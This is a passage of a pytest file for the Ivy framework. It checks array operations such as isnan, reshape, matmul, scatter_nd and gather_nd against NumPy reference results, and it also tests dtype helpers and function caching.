assert np.allclose(call(ivy.indices_where, x), np.asarray(ivy.functional.backends.numpy.indices_where(ivy.to_numpy(x))))
# isnan
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('nan')], [float('nan'), 3.]],
[[False, True], [True, False]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isnan(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isnan(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isnan, x), res)
# isinf
@pytest.mark.parametrize(
"x_n_res", [([True], [False]),
([[0., float('inf')], [float('nan'), -float('inf')]],
[[False, True], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isinf(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isinf(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isinf, x), res)
# isfinite
@pytest.mark.parametrize(
"x_n_res", [([True], [True]),
([[0., float('inf')], [float('nan'), 3.]],
[[True, False], [False, True]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_isfinite(x_n_res, dtype, tensor_fn, dev, call):
x, res = x_n_res
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.isfinite(x)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.isfinite, x), res)
# reshape
@pytest.mark.parametrize(
"x_n_shp", [(1., (1, 1)), (1., 1), (1., []), ([[1.]], []), ([[0., 1.], [2., 3.]], (1, 4, 1))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_reshape(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.reshape(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == ((new_shape,) if isinstance(new_shape, int) else tuple(new_shape))
# value test
assert np.allclose(call(ivy.reshape, x, new_shape), np.asarray(ivy.functional.backends.numpy.reshape(ivy.to_numpy(x), new_shape)))
# broadcast_to
@pytest.mark.parametrize(
"x_n_shp", [([1.], (2, 1)), ([[0., 1.], [2., 3.]], (10, 2, 2))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_broadcast_to(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.broadcast_to(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == len(new_shape)
# value test
assert np.allclose(call(ivy.broadcast_to, x, new_shape),
np.asarray(ivy.functional.backends.numpy.broadcast_to(ivy.to_numpy(x), new_shape)))
# squeeze
# @pytest.mark.parametrize(
# "x_n_axis", [(1., 0), (1., -1), ([[1.]], None), ([[[0.], [1.]], [[2.], [3.]]], -1)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_squeeze(x_n_axis, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis = x_n_axis
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.squeeze(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# if axis is None:
# expected_shape = [item for item in x.shape if item != 1]
# elif x.shape == ():
# expected_shape = []
# else:
# expected_shape = list(x.shape)
# expected_shape.pop(axis)
# assert ret.shape == tuple(expected_shape)
# # value test
# assert np.allclose(call(ivy.squeeze, x, axis), np.asarray(ivy.functional.backends.numpy.squeeze(ivy.to_numpy(x), axis)))
# zeros
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_zeros(shape, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.zeros(shape, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.zeros, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.zeros(shape, dtype)))
# zeros_like
@pytest.mark.parametrize(
"x", [1, [1], [[1], [2], [3]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zeros_like(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.zeros_like(x, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.zeros_like, x, dtype, dev),
np.asarray(ivy.functional.backends.numpy.zeros_like(ivy.to_numpy(x), dtype)))
# ones
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_ones(shape, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.ones(shape, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.ones, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.ones(shape, dtype)))
# ones_like
# @pytest.mark.parametrize(
# "x", [1, [1], [[1], [2], [3]]])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_ones_like(x, dtype, tensor_fn, dev, call):
# # smoke test
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.ones_like(x, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == x.shape
# # value test
# assert np.allclose(call(ivy.ones_like, x, dtype, dev),
# np.asarray(ivy.functional.backends.numpy.ones_like(ivy.to_numpy(x), dtype)))
# full
# @pytest.mark.parametrize(
# "shape", [(), (1, 2, 3), tuple([1]*10)])
# @pytest.mark.parametrize(
# "fill_val", [2., -7.])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_full(shape, fill_val, dtype, tensor_fn, dev, call):
# # smoke test
# ret = ivy.full(shape, fill_val, dtype, dev)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == tuple(shape)
# # value test
# assert np.allclose(call(ivy.full, shape, fill_val, dtype, dev),
# np.asarray(ivy.functional.backends.numpy.full(shape, fill_val, dtype)))
# one_hot
@pytest.mark.parametrize(
"ind_n_depth", [([0], 1), ([0, 1, 2], 3), ([[1, 3], [0, 0], [8, 4], [7, 9]], 10)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_one_hot(ind_n_depth, dtype, tensor_fn, dev, call):
# smoke test
ind, depth = ind_n_depth
if isinstance(ind, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ind = ivy.array(ind, 'int32', dev)
ret = ivy.one_hot(ind, depth, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == ind.shape + (depth,)
# value test
assert np.allclose(call(ivy.one_hot, ind, depth, dev),
np.asarray(ivy.functional.backends.numpy.one_hot(ivy.to_numpy(ind), depth)))
# cross
@pytest.mark.parametrize(
"x1_n_x2", [([0., 1., 2.], [3., 4., 5.]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4., 5.], [5., 4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cross(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.cross(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.cross, x1, x2), np.asarray(ivy.functional.backends.numpy.cross(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# matmul
@pytest.mark.parametrize(
"x1_n_x2", [([[0., 1., 2.]], [[3.], [4.], [5.]]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4.], [5., 5.], [4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_matmul(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.matmul(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape[:-1] + (x2.shape[-1],)
# value test
assert np.allclose(call(ivy.matmul, x1, x2), np.asarray(ivy.functional.backends.numpy.matmul(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# cumsum
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumsum(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumsum(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumsum, x, axis), np.asarray(ivy.functional.backends.numpy.cumsum(ivy.to_numpy(x), axis)))
# cumprod
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"exclusive", [True, False])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumprod(x_n_axis, exclusive, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumprod(x, axis, exclusive)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumprod, x, axis, exclusive),
np.asarray(ivy.functional.backends.numpy.cumprod(ivy.to_numpy(x), axis, exclusive)))
# identity
@pytest.mark.parametrize(
"dim_n_bs", [(3, None), (1, (2, 3)), (5, (1, 2, 3))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_identity(dim_n_bs, dtype, tensor_fn, dev, call):
# smoke test
dim, bs = dim_n_bs
ret = ivy.identity(dim, dtype, bs, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (tuple(bs) if bs else ()) + (dim, dim)
# value test
assert np.allclose(call(ivy.identity, dim, dtype, bs, dev),
np.asarray(ivy.functional.backends.numpy.identity(dim, dtype, bs)))
# meshgrid
@pytest.mark.parametrize(
"xs", [([1, 2, 3], [4, 5, 6]), ([1, 2, 3], [4, 5, 6, 7], [8, 9])])
@pytest.mark.parametrize(
"indexing", ['xy', 'ij'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_meshgrid(xs, indexing, dtype, tensor_fn, dev, call):
# smoke test
xs_as_arrays = [ivy.array(x, 'int32', dev) for x in xs]
rets = ivy.meshgrid(*xs_as_arrays, indexing=indexing)
# type test
for ret in rets:
assert ivy.is_array(ret)
# cardinality test
target_shape = tuple([len(x) for x in xs])
if indexing == 'xy':
target_shape = (target_shape[1], target_shape[0]) + target_shape[2:]
for ret in rets:
assert ret.shape == target_shape
# value test
assert np.allclose(
call(ivy.meshgrid, *xs_as_arrays, indexing=indexing),
[np.asarray(i) for i in ivy.functional.backends.numpy.meshgrid(*[ivy.to_numpy(x) for x in xs_as_arrays], indexing=indexing)])
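# Note on the target_shape logic above: with indexing='ij' each returned grid
# has shape (len(x0), len(x1), ...), while indexing='xy' follows the
# numpy.meshgrid convention and swaps the first two axes. For
# xs = ([1, 2, 3], [4, 5, 6, 7], [8, 9]) that is (3, 4, 2) for 'ij' and
# (4, 3, 2) for 'xy'.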
# scatter_flat
@pytest.mark.parametrize(
"inds_n_upd_n_size_n_tnsr_n_wdup", [([0, 4, 1, 2], [1, 2, 3, 4], 8, None, False),
([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], 8, None, True),
([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], None, [11, 10, 9, 8, 7, 6], True)])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_flat(inds_n_upd_n_size_n_tnsr_n_wdup, red, dtype, tensor_fn, dev, call):
# smoke test
if red in ('sum', 'min', 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
inds, upd, size, tensor, with_duplicates = inds_n_upd_n_size_n_tnsr_n_wdup
if ivy.exists(tensor) and call is helpers.mx_call:
# mxnet does not support scattering into pre-existing tensors
pytest.skip()
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
if tensor:
# pytorch variables do not support in-place updates
tensor = ivy.array(tensor, dtype, dev) if ivy.current_framework_str() == 'torch'\
else tensor_fn(tensor, dtype, dev)
ret = ivy.scatter_flat(inds, upd, size, tensor, red, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
if size:
assert ret.shape == (size,)
else:
assert ret.shape == tensor.shape
# value test
if red == 'replace' and with_duplicates:
# replace with duplicates gives non-deterministic outputs
return
assert np.allclose(call(ivy.scatter_flat, inds, upd, size, tensor, red, dev),
np.asarray(ivy.functional.backends.numpy.scatter_flat(
ivy.to_numpy(inds), ivy.to_numpy(upd), size,
ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor, red)))
# scatter_nd
@pytest.mark.parametrize(
"inds_n_upd_n_shape_tnsr_n_wdup",
[([[4], [3], [1], [7]], [9, 10, 11, 12], [8], None, False), ([[0, 1, 2]], [1], [3, 3, 3], None, False),
([[0], [2]], [[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]],
[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]]], [4, 4, 4], None, False),
([[0, 1, 2]], [1], None, [[[1, 2, 3], [4, 5, 6], [7, 8, 9]],
[[4, 5, 6], [7, 8, 9], [1, 2, 3]],
[[7, 8, 9], [1, 2, 3], [4, 5, 6]]], False)])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_nd(inds_n_upd_n_shape_tnsr_n_wdup, red, dtype, tensor_fn, dev, call):
# smoke test
if red in ('sum', 'min', 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
inds, upd, shape, tensor, with_duplicates = inds_n_upd_n_shape_tnsr_n_wdup
if ivy.exists(tensor) and call is helpers.mx_call:
# mxnet does not support scattering into pre-existing tensors
pytest.skip()
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
if tensor:
# pytorch variables do not support in-place updates
tensor = ivy.array(tensor, dtype, dev) if ivy.current_framework_str() == 'torch'\
else tensor_fn(tensor, dtype, dev)
ret = ivy.scatter_nd(inds, upd, shape, tensor, red, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
if shape:
assert tuple(ret.shape) == tuple(shape)
else:
assert tuple(ret.shape) == tuple(tensor.shape)
# value test
if red == 'replace' and with_duplicates:
# replace with duplicates gives non-deterministic outputs
return
ret = call(ivy.scatter_nd, inds, upd, shape, tensor, red, dev)
true = np.asarray(ivy.functional.backends.numpy.scatter_nd(
ivy.to_numpy(inds), ivy.to_numpy(upd), shape,
ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor, red))
assert np.allclose(ret, true)
# gather
@pytest.mark.parametrize(
"prms_n_inds_n_axis", [([9, 8, 7, 6, 5, 4, 3, 2, 1, 0], [0, 4, 7], 0),
([[1, 2], [3, 4]], [[0, 0], [1, 0]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather(prms_n_inds_n_axis, dtype, tensor_fn, dev, call):
# smoke test
prms, inds, axis = prms_n_inds_n_axis
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather(prms, inds, axis, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == inds.shape
# value test
assert np.allclose(call(ivy.gather, prms, inds, axis, dev),
np.asarray(ivy.functional.backends.numpy.gather(ivy.to_numpy(prms), ivy.to_numpy(inds), axis)))
# gather_nd
@pytest.mark.parametrize(
"prms_n_inds", [([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[0, 1], [1, 0]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1]], [[1, 0]]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1, 0]], [[1, 0, 1]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather_nd(prms_n_inds, dtype, tensor_fn, dev, call):
# smoke test
prms, inds = prms_n_inds
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather_nd(prms, inds, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == inds.shape[:-1] + prms.shape[inds.shape[-1]:]
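# Worked example from the second parametrized case above: prms has shape (2, 2, 2)
# and inds has shape (2, 1, 2), so the gathered result has shape
# inds.shape[:-1] + prms.shape[2:] = (2, 1) + (2,) = (2, 1, 2).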
# value test
assert np.allclose(call(ivy.gather_nd, prms, inds, dev),
np.asarray(ivy.functional.backends.numpy.gather_nd(ivy.to_numpy(prms), ivy.to_numpy(inds))))
# linear_resample
@pytest.mark.parametrize(
"x_n_samples_n_axis_n_y_true", [([[10., 9., 8.]], 9, -1, [[10., 9.75, 9.5, 9.25, 9., 8.75, 8.5, 8.25, 8.]]),
([[[10., 9.], [8., 7.]]], 5, -2,
[[[10., 9.], [9.5, 8.5], [9., 8.], [8.5, 7.5], [8., 7.]]]),
([[[10., 9.], [8., 7.]]], 5, -1,
[[[10., 9.75, 9.5, 9.25, 9.], [8., 7.75, 7.5, 7.25, 7.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linear_resample(x_n_samples_n_axis_n_y_true, dtype, tensor_fn, dev, call):
# smoke test
x, samples, axis, y_true = x_n_samples_n_axis_n_y_true
x = tensor_fn(x, dtype, dev)
ret = ivy.linear_resample(x, samples, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = list(x.shape)
num_x_dims = len(x_shape)
axis = axis % num_x_dims
x_pre_shape = x_shape[0:axis]
num_vals = x.shape[axis]
x_post_shape = x_shape[axis+1:]
assert list(ret.shape) == x_pre_shape + [samples] + x_post_shape
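# For instance, the first parametrized case has x of shape (1, 3), axis -1 and
# samples 9, so axis resolves to 1 and the expected shape is [1] + [9] + [] = [1, 9].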
# value test
y_true = np.array(y_true)
y = call(ivy.linear_resample, x, samples, axis)
assert np.allclose(y, y_true)
# exists
@pytest.mark.parametrize(
"x", [[1.], None, [[10., 9., 8.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_exists(x, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
ret = ivy.exists(x)
# type test
assert isinstance(ret, bool)
# value test
y_true = x is not None
assert ret == y_true
# default
@pytest.mark.parametrize(
"x_n_dv", [([1.], [2.]), (None, [2.]), ([[10., 9., 8.]], [2.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_default(x_n_dv, dtype, tensor_fn, dev, call):
x, dv = x_n_dv
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
dv = tensor_fn(dv, dtype, dev)
ret = ivy.default(x, dv)
# type test
assert ivy.is_array(ret)
# value test
y_true = ivy.to_numpy(x if x is not None else dv)
assert np.allclose(call(ivy.default, x, dv), y_true)
# dtype bits
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ivy.all_dtype_strs)
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_bits(x, dtype, tensor_fn, dev, call):
# smoke test
if ivy.invalid_dtype(dtype):
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.dtype_bits(ivy.dtype(x))
# type test
assert isinstance(ret, int)
assert ret in [1, 8, 16, 32, 64]
# dtype_to_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_to_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dtype_as_str = ivy.dtype(x, as_str=True)
dtype_to_str = ivy.dtype_to_str(ivy.dtype(x))
# type test
assert isinstance(dtype_as_str, str)
assert isinstance(dtype_to_str, str)
# value test
assert dtype_to_str == dtype_as_str
# dtype_from_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_from_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dt0 = ivy.dtype_from_str(ivy.dtype(x, as_str=True))
dt1 = ivy.dtype(x)
# value test
assert dt0 is dt1
def test_cache_fn(dev, call):
def func():
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn()
ret0_again = cached_fn()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)()
ret0_again = ivy.cache_fn(func)()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
def test_cache_fn_with_args(dev, call):
def func(_):
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn(0)
ret0_again = cached_fn(0)
ret1 = cached_fn(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)(0)
ret0_again = ivy.cache_fn(func)(0)
ret1 = ivy.cache_fn(func)(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# def test_framework_setting_with_threading(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# def thread_fn():
# ivy.set_framework('numpy')
# x_ = np.array([0., 1., 2.])
# for _ in range(2000):
# try:
# ivy.reduce_mean(x_)
# except TypeError:
# return False
# ivy.unset_framework()
# return True
#
# # get original framework string and array
# fws = ivy.current_framework_str()
# x = ivy.array([0., 1., 2.])
#
# # start numpy loop thread
# thread = threading.Thread(target=thread_fn)
# thread.start()
#
# # start local original framework loop
# ivy.set_framework(fws)
# for _ in range(2000):
# ivy.reduce_mean(x)
# ivy.unset_framework()
#
# assert not thread.join()
def test_framework_setting_with_multiprocessing(dev, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
def worker_fn(out_queue):
ivy.set_framework('numpy')
x_ = np.array([0., 1., 2.])
for _ in range(1000):
try:
ivy.reduce_mean(x_)
except TypeError:
out_queue.put(False)
return
ivy.unset_framework()
out_queue.put(True)
# get original framework string and array
fws = ivy.current_framework_str()
x = ivy.array([0., 1., 2.])
# start numpy loop thread
output_queue = multiprocessing.Queue()
worker = multiprocessing.Process(target=worker_fn, args=(output_queue,))
worker.start()
# start local original framework loop
ivy.set_framework(fws)
for _ in range(1000):
ivy.reduce_mean(x)
ivy.unset_framework()
worker.join()
assert output_queue.get_nowait()
# def test_explicit_ivy_framework_handles(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# # store original framework string and unset
# fw_str = ivy.current_framework_str()
# ivy.unset_framework()
#
# # set with explicit handle caught
# ivy_exp = ivy.get_framework(fw_str)
# assert ivy_exp.current_framework_str() == fw_str
#
# # assert backend implemented function is accessible
# assert 'array' in ivy_exp.__dict__
# assert callable(ivy_exp.array)
#
# # assert joint implemented function is also accessible
# assert 'cache_fn' in ivy_exp.__dict__
# assert callable(ivy_exp.cache_fn)
#
# # set global ivy to numpy
# ivy.set_framework('numpy')
#
# # assert the explicit handle is still unchanged
# assert ivy.current_framework_str() == 'numpy'
# assert ivy_exp.current_framework_str() == fw_str
#
# # unset global ivy from numpy
# ivy.unset_framework()
# def test_class_ivy_handles(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# class ArrayGen:
#
# def __init__(self, ivyh):
# self._ivy = ivyh
#
# def get_array(self):
# return self._ivy.array([0., 1., 2.])
#
# # create instance
# ag = ArrayGen(ivy.get_framework())
#
# # create array from array generator
# x = ag.get_array()
#
# # verify this is not a numpy array
# assert not isinstance(x, np.ndarray)
#
# # change global framework to numpy
# ivy.set_framework('numpy')
#
# # create another array from array generator
# x = ag.get_array()
#
# # verify this is not still a numpy array
